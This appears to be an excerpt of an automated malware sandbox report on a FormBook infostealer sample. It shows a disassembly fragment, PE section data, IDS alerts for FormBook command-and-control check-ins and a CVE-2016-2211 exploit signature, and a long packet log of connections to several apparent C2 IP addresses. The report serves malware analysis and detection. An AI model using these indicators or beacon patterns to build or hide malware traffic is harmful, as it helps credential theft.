                                                                                                                                                            add ecx, edx
                                                                                                                                                            jne 00007F4650C30E2Dh
                                                                                                                                                            call 00007F4650C32CCBh
                                                                                                                                                            mov dword ptr [ebp-000000C8h], eax
                                                                                                                                                            lea eax, dword ptr [ebp-44h]
                                                                                                                                                            push eax
                                                                                                                                                            push 0000056Bh
                                                                                                                                                            call 00007F4650C30A67h
                                                                                                                                                            lea eax, dword ptr [ebp-0000028Ch]
                                                                                                                                                            push eax
                                                                                                                                                            push 00002DE9h
                                                                                                                                                            call 00007F4650C30A56h
                                                                                                                                                            lea eax, dword ptr [ebp-0000028Ch]
                                                                                                                                                            push 00004D4Ch

                                                                                                                                                            Rich Headers

                                                                                                                                                            Programming Language:
                                                                                                                                                            • [C++] VS2012 build 50727
                                                                                                                                                            • [ASM] VS2012 build 50727
                                                                                                                                                            • [LNK] VS2012 build 50727

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x10000x457a40x45800637e5af39854f7e15d1c07ce182ebe1eFalse0.9891489152428058data7.995583264592467IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                                                            Network Behavior

                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2024-11-12T18:33:31.413900+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849706TCP
                                                                                                                                                            2024-11-12T18:33:43.956038+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84971335.156.117.13180TCP
                                                                                                                                                            2024-11-12T18:34:00.030555+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497143.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:02.649993+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497153.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:05.195958+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497163.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:07.739792+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497173.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:10.131403+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849718TCP
                                                                                                                                                            2024-11-12T18:34:21.637687+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497193.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:24.294717+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497203.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:26.917164+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497213.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:30.597777+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8497223.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:34:37.402392+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849747206.119.82.13480TCP
                                                                                                                                                            2024-11-12T18:34:40.480678+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849762206.119.82.13480TCP
                                                                                                                                                            2024-11-12T18:34:42.611762+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849770206.119.82.13480TCP
                                                                                                                                                            2024-11-12T18:34:45.340269+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849783206.119.82.13480TCP
                                                                                                                                                            2024-11-12T18:34:51.307912+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849806162.213.249.21680TCP
                                                                                                                                                            2024-11-12T18:34:53.923000+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849815162.213.249.21680TCP
                                                                                                                                                            2024-11-12T18:34:56.552188+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849822162.213.249.21680TCP
                                                                                                                                                            2024-11-12T18:34:59.204438+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849831162.213.249.21680TCP
                                                                                                                                                            2024-11-12T18:35:05.183868+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849850217.160.0.23180TCP
                                                                                                                                                            2024-11-12T18:35:07.821672+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849860217.160.0.23180TCP
                                                                                                                                                            2024-11-12T18:35:10.528161+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849872217.160.0.23180TCP
                                                                                                                                                            2024-11-12T18:35:13.682504+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849885217.160.0.23180TCP
                                                                                                                                                            2024-11-12T18:35:20.340272+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84992154.179.173.6080TCP
                                                                                                                                                            2024-11-12T18:35:22.840113+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84993554.179.173.6080TCP
                                                                                                                                                            2024-11-12T18:35:25.465126+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84994854.179.173.6080TCP
                                                                                                                                                            2024-11-12T18:35:28.090174+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84996154.179.173.6080TCP
                                                                                                                                                            2024-11-12T18:35:33.829472+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8499893.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:35:36.354898+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8499993.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:35:38.903628+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8500063.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:35:41.457326+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8500073.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:35:55.781092+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.850008156.226.22.23380TCP
                                                                                                                                                            2024-11-12T18:35:58.435367+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.850009156.226.22.23380TCP
                                                                                                                                                            2024-11-12T18:36:01.027844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.850010156.226.22.23380TCP
                                                                                                                                                            2024-11-12T18:36:03.668475+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.850011156.226.22.23380TCP
                                                                                                                                                            2024-11-12T18:36:09.724598+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.85001252.20.84.6280TCP
                                                                                                                                                            2024-11-12T18:36:12.298490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.85001352.20.84.6280TCP
                                                                                                                                                            2024-11-12T18:36:14.833492+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.85001452.20.84.6280TCP
                                                                                                                                                            2024-11-12T18:36:17.395127+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.85001552.20.84.6280TCP
                                                                                                                                                            2024-11-12T18:36:24.358877+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537513.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:36:26.934226+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537523.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:36:29.471616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537533.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:36:32.063113+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8537543.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:36:38.325576+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.853755142.250.185.17980TCP
                                                                                                                                                            2024-11-12T18:36:40.918665+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.853756142.250.185.17980TCP
                                                                                                                                                            2024-11-12T18:36:43.487336+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.853757142.250.185.17980TCP
                                                                                                                                                            2024-11-12T18:36:45.965548+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.853758142.250.185.17980TCP
                                                                                                                                                            2024-11-12T18:36:52.687626+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.853759172.81.61.22480TCP
                                                                                                                                                            2024-11-12T18:36:55.293841+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.853760172.81.61.22480TCP
                                                                                                                                                            2024-11-12T18:36:57.840790+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.853761172.81.61.22480TCP
                                                                                                                                                            2024-11-12T18:37:07.373757+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.853762172.81.61.22480TCP
                                                                                                                                                            2024-11-12T18:37:13.050869+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537633.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:15.611386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537643.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:18.163807+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8537653.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:22.563162+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.8537663.33.130.19080TCP
                                                                                                                                                            2024-11-12T18:37:32.004901+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.85376735.156.117.13180TCP

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 12, 2024 18:33:42.619502068 CET4971380192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:33:42.624659061 CET804971335.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:42.626760006 CET4971380192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:33:42.722141027 CET4971380192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:33:42.726970911 CET804971335.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:43.955867052 CET804971335.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:43.955899954 CET804971335.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:43.956037998 CET4971380192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:33:43.956121922 CET804971335.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:44.011487961 CET4971380192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:33:44.076708078 CET804971335.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:44.076849937 CET4971380192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:33:44.078382969 CET4971380192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:33:44.083601952 CET804971335.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:59.395365953 CET4971480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:33:59.402931929 CET80497143.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:59.403007030 CET4971480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:33:59.423479080 CET4971480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:33:59.429474115 CET80497143.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:00.030452013 CET80497143.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:00.030555010 CET4971480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:00.933516979 CET4971480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:00.938515902 CET80497143.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:01.960823059 CET4971580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:01.965953112 CET80497153.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:01.966068029 CET4971580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:02.023849010 CET4971580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:02.029036045 CET80497153.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:02.649848938 CET80497153.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:02.649992943 CET4971580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:03.542939901 CET4971580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:03.549942970 CET80497153.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:04.562494040 CET4971680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:04.569246054 CET80497163.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:04.569329023 CET4971680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:04.581762075 CET4971680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:04.588751078 CET80497163.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:04.588762999 CET80497163.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:05.195900917 CET80497163.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:05.195957899 CET4971680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:06.089808941 CET4971680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:06.094679117 CET80497163.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:07.108913898 CET4971780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:07.113852978 CET80497173.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:07.113939047 CET4971780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:07.121895075 CET4971780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:07.126785040 CET80497173.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:07.739193916 CET80497173.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:07.739645004 CET80497173.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:07.739792109 CET4971780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:07.742827892 CET4971780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:07.748790026 CET80497173.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:21.005846977 CET4971980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:21.010699034 CET80497193.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:21.010889053 CET4971980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:21.022697926 CET4971980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:21.028167963 CET80497193.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:21.637625933 CET80497193.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:21.637686968 CET4971980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:22.527369022 CET4971980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:22.532984018 CET80497193.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:23.653879881 CET4972080192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:23.658884048 CET80497203.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:23.658997059 CET4972080192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:23.683288097 CET4972080192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:23.688246012 CET80497203.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:24.294644117 CET80497203.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:24.294717073 CET4972080192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:25.199276924 CET4972080192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:25.207417011 CET80497203.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:26.271369934 CET4972180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:26.277206898 CET80497213.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:26.277324915 CET4972180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:26.393382072 CET4972180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:26.398710966 CET80497213.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:26.398735046 CET80497213.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:26.917108059 CET80497213.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:26.917164087 CET4972180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:27.902467012 CET4972180192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:28.056572914 CET80497213.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:28.921704054 CET4972280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:28.926882982 CET80497223.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:28.926984072 CET4972280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:28.934596062 CET4972280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:28.939383984 CET80497223.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:30.596894979 CET80497223.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:30.597610950 CET80497223.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:30.597776890 CET4972280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:30.599932909 CET4972280192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:34:30.873362064 CET80497223.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:36.402509928 CET4974780192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:36.407812119 CET8049747206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:36.407886982 CET4974780192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:36.419838905 CET4974780192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:36.424773932 CET8049747206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:37.356420994 CET8049747206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:37.402391911 CET4974780192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:37.538284063 CET8049747206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:37.538451910 CET4974780192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:37.950961113 CET4974780192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:38.953511953 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:38.958753109 CET8049762206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:38.958832979 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:38.971611977 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:38.976850986 CET8049762206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:40.480678082 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:40.719484091 CET8049762206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:40.719540119 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:40.719556093 CET8049762206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:40.719566107 CET8049762206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:40.719594002 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:40.719614983 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:40.727097034 CET8049762206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:40.727144003 CET8049762206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:40.727155924 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:40.727183104 CET4976280192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:41.500121117 CET4977080192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:41.505078077 CET8049770206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:41.505420923 CET4977080192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:41.521265984 CET4977080192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:41.527122021 CET8049770206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:41.527267933 CET8049770206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:42.465552092 CET8049770206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:42.611762047 CET4977080192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:42.648520947 CET8049770206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:42.648577929 CET4977080192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:43.027478933 CET4977080192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:44.046650887 CET4978380192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:44.051882982 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:44.051981926 CET4978380192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:44.060735941 CET4978380192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:44.066155910 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:45.337590933 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:45.340205908 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:45.340217113 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:45.340269089 CET4978380192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:45.341773987 CET4978380192.168.2.8206.119.82.134
                                                                                                                                                            Nov 12, 2024 18:34:45.349168062 CET8049783206.119.82.134192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:50.543162107 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:50.548057079 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:50.548130035 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:50.563554049 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:50.568538904 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:51.269753933 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:51.307854891 CET8049806162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:51.307912111 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:52.074549913 CET4980680192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.170500994 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.175662994 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.179085970 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.195826054 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:53.200838089 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.882500887 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.922939062 CET8049815162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:53.923000097 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:54.699449062 CET4981580192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.793468952 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.798463106 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:55.799094915 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.916640043 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:55.921818972 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:55.921883106 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:56.514447927 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:56.552082062 CET8049822162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:56.552187920 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:57.433834076 CET4982280192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.455238104 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.460398912 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:58.460481882 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.470088959 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:58.475018978 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:59.166017056 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:59.204207897 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:59.204437971 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:59.207374096 CET4983180192.168.2.8162.213.249.216
                                                                                                                                                            Nov 12, 2024 18:34:59.212562084 CET8049831162.213.249.216192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:04.263602018 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:04.268616915 CET8049850217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:04.268721104 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:04.288039923 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:04.292834997 CET8049850217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:05.120455980 CET8049850217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:05.183867931 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:05.247797966 CET8049850217.160.0.231192.168.2.8
